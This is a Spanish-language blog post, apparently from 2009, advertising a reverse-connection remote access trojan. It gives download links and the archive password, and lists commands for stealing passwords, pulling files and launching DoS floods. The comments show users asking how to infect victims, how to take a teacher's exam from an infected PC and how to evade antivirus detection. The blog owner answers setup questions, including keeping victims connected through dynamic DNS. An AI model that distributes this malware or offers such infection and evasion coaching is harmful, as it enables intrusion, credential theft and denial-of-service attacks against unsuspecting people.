t3c4i3's Remote Access Shell es una nueva herramienta de administracion remota con una interfaz de linea de comandos creado por H3LL en C.
La herramienta utiliza la Shell de Windows y algunos comandos personalizados como descarga, o ddos para administrar las pcs remotas. Tambien soporta el envio de comandos masivo a todos los clientes.
Funciona con conexion inversa, se llama servidor a la pc del usuario y cliente a las pcs remotas, al contrario de los troyanos de conexion inversa.
Para configurar el cliente basta con colocar la ip y el puerto al que se conectara. En el servidor solo se debe colocar el puerto a escuchar, soporta multiples conexiones en un mismo o distinto puerto.
Comandos personalizados:
1 - download "filename"
2 - upload [/server | /url] "filename" "url"
4 - click "website" count
5 - password [/get]
6 - dos "ip" port [/tcp] sockets packets
7 - display [/desktop | /information]
8 - del "filename" (modified)
9 - prank [/list | number]
Descarga
t3c4i3's Remote Access Shell v1.07 (rapidshare)
t3c4i3's Remote Access Shell v1.07 (megaupload)
Pass: troyanosyvirus.com.ar
Suscribirse a:
Enviar comentarios (Atom)
Entradas
43 comentarios:
muy buen programa normal y sencillo entre a la pagina del autor pero esta en ingles de donde es el autor mauro?
S-O-R-P-R-E-N-D-I-D-Í-S-I-M-O
Keylog function has been locked from public version. :S
Demasiado simple, pero no lo sufisientemente lammer... E indetectable :D ¿Durará mucho?
En primer lugar gracias MAURO por tu blog, que esta genial y te deseo suerte con el..
en segundo lugar, el rat esta bastante bien, aunque el entorno no es el mismo que el de cualquier otro troyano, las funciones son bastante completas como para perpetuar un ataque serio. todavia tengo que jugar un rato con el, pero parece bastante bueno.
en tercer lugar... Bieeeen¡¡
por fin un troyano de conexion inversa llama como es debido al cliente y al servidor, esto es algo que lia mucho a los noobs porque luego cuando dan teoria de redes se dan cuenta de que lo aprendieron al revés de como es en realidad.
Yo he optado por llamarlos "Remoto" y "local" para evitar lios.
buenisimo , si tubieras un manualsito taria re copadojiji, gracias igual pero un manual postiateloo:P
Lamento informar amigos que Kaspersky ya lo detecta T_T es Nuevo y ya fue detectado por kaspersky con el Nombre de:
Backdoor.Win32.Agent.alke
ok les informo...
sin duda kaspersky es uno de los mejores anti-Virus... y no tiene comparacion... xD
la ip que hay que poner es la que sale en ipconfig (cmd) o la otra ip??
porque cuando le pincho al archivo creado (para probarlo conmigo mismo) desparece?
gracias
que ip hay que poner la 192.168... o la otra? cuando pincho el archivo se va automaticamente a system32 pero no lo detecta el programilla... sabeis algo??
Hola!
fabriany no se de donde es el autor, ni lo conocia
Alexis jaja si, la opcio de captura de pantalla y camara limita a muchas personas, tal vez dure mas q algun troyano..
Pyros32 jaja si es verdad primer rat que veo donde se nombra bien al servidor yal cliente, yo al prinsipio me confundia con eso, pero despues me acostumbre a nombrarlo de forma indebida como todos jaja
Omar Morales si detecta rapido a este tipo de herramientas.
La ip que deben colocar es su ip publica para que funcione fuera de la red, o sea la ip que sale en www.cualesmiip.com, pero si quieren que funcione en la misma red donde estan tienen q poner la ip 192.168... o 10.0.... y si quieren que funcione en local la ip 127.0.0.1
saludos y gracias por sus comentarios
si lo se! pero solo es detectado por 2 Anti-Virus el Kaspersky y otro de un Nombre Raro...
Ejemplo yo utilizo el Kaspersky internet security 2010 y me lo detecto...
Saludos... xD
Creo un cliente, pongo la IP, 127.0.0.1, y sin embargo, cuando abro el cliente creado, y pongo:
Load server, me dice que no hay clientes conectados.
Ya es detectable por el antivir :(
por favor necesito ayuda ya tengo el trojan en una pc victima pero no puedo ver sus archivos, ejemplo entro
y aparesco en el disco local C:\
hay le escrivo el comando DIR y me aparece:[Error] Failed to read file on client side
¿Donde se introducen los comandos tipo "dos" y todo eso?
¿Puedes poner un ejemplo del comando DOS, como quedaría, si quieres en las IP pon XXX.XXX.XXX.XXX
Gracias
en el encabezado de puerto se necesita abrir algun puerto o cual es el mas recomendable
HOLA, QUE IP TENGO QUE PONER: LA DE LA VICTIMA O LA MIA?
ESQUE NO ENTENDI MUY BIEN GRACIAS POR EL APORTE YA LO PROBE CON LA MIA.
AYUDA
1 de octubre de 2009 13:00 proba poner tu ip local, esa q es 192.168... o la otra 10.0... sale en ipconfig
1 de octubre de 2009 23:17 pone dir c:\
2 de octubre de 2009 19:48 usa cualquier puerto
2 de octubre de 2009 23:10 pones tu ip, es de conexion inversa
saludos
Mauro sera que puedes publicar el bloquea facebook se llama facebook freezer claro si quieres... saludos
Buuuuuf, me encantan las herramientas de consola ... no sé porque y esto que aún no he tocado Linux, pero no sé, pienso que es una señal de rebeldía y también de "Amor" jajaja, me agrado mucho la herramienta Mauro.
hola, una pregunta, Y si cambio de ip que pasa?
porfin un troyano de conexion inversa! Y SI CAMBIO DE IP DEJA DE FUNCIONAR???
Al querer abrirlo me pide una contraseña. ¿cual es?
¿Como puedo subir un archivo a mi víctima infectada?
Comando UPLOAD, pero como está explicado no se usarlo, pon un ejemplo o algo.
Porcierto, no tengo ftp. (Por si es necesario)
Bueno, gracias, espero sus respuestas.
Anonimo 1: Si cambias tu ip ya no conecta por eso debes de utilizar una no-ip para evitar esos problemas.
Anonimo 2: Mira abajo del link de megaupload hay esta la respuesta al problema del pass
Saludos
Hola a todos,
queria decirles que me parece muy interesante su pagina y les escribo para darles los mas grandes agradecimientos por sus grades aportes.
y tambien les escribo para animarlos a seguir adelante con su web, gracias a paginas o espacios como los suyos es que podemos contar con material invaluable, no basura que se encuentra en la red.
Exitos
mauro, muchas gracias, esta muy bueno el rat y muchas gracias por tu esfuerzo.
pero al publicar estas herramientas en tu blog no tardan ni dos dias en ser detectadas.
una lastima por que se veia entrete.
se agradece el ezfuerzo pero no vale la pena descargarlo por que ya esta mas que detectado.
muy bueno
ahh nececito ayuda xd tengo todo listo (creo) cree la cosa y puse la ip publica puerto y id y todo ahora me conecto y me dice que tengo 0 conectados , mi pregunta es como infecto a la victima? que le tengo que mandar o que devo hacer para que la victima se infecte?
se lo agradeceria mucho al que me guie :D
hola wenas queria preguntar como hago para descargar el examen de la profe a la que tengo infectada con el troyano este y q no es detectado por avast asta hoy dia 8 de octubre por q el comando download no me sirve mauro creo q te llamas te agredeceria mucho mucho un pequeño manual solo de los comandos esos q no da el programa gracias saludos el richa!
Primero que todo exelente la pagina :D,
bueno nececito ayuda ya que hice puse la ip , puerto , ed y el cliente y todo eso pero cuando me conecto dice 0 usuarios , como hago para infectar a mi victima? que devo mandar a mi victima? gracias de antemano xD
Mauro mi hermano donde anda metido estas en competencia? ESTILO TRUE ? YO veo a la mayoria de los programadores calmados que estaran haciendo ????
Anonimo final jaja la competencia de extilo true creo que se suspendio pero no estoy seguro bueno yo estaba inscrito pero ya no participare por que se cancelo supuestamente eso me dijo el Admin "KLG" pero bueno lo de programadores calmados es porque deseguro muchos ahorita como yo salen de vacaciones y lo menos que quieren hacer es peliar contra el copilador jajaja pero los que no salen de vacaciones es porque estan en algun rat o algo por el estilo
Saludos
Me he auto-infectado con este troyano.
¿Como puedo desinfectarme?
ok dark tengo un blogger y quiero publicar sus herramientas me gustaria hablar con tigo si queres ya que no puedo crear mis propias herramientas ya que estoy empezando desde 0 en el visual y a mauro tambien lo que quiero es reunir todos los programas en una sola pagina la de sharki, la de indetectables, la de dark, paginas importantes ok... y ir aportando en lo que pueda att
I'd like to know what are you guys saying. =)
Como hago para bajar el archivo de la victima? hago dir c:\Test\test.doc por ejemplo (que alli hay un archivo que estoy haciendo pruebas con varios pcs) y no se donde se me guarda el archivo o nose si se descarga
Otro que me sale con dengue :S
Y en vez de entrar por la boca abre la cola y despues se meten sus amigos..
¿Entienedes?
Trojan Backdoor
hola, tendras algun programa para trabajar desde linux hacia windows, de acceso remoto con coneccion inversa?? desde ya muchas gracias
holaaa mauro necesito tu ayuda mira mi corre0 s soadmaniaco_yourfather ya sabes hotm...
de antemano gracias
Que hago si tengo un router? Me imagino que tengo que utilizar el ip externo pero no pasa nada, dentro de la red con el ip interno si funciona perfecto...
como se crea el server, para infectar?
Con esto se puede enviar un troyano sin necesidad de que la victima asepte algo?
He conseguido hacerlo indetectable en 2011 ¡¡¡
Publicar un comentario en la entrada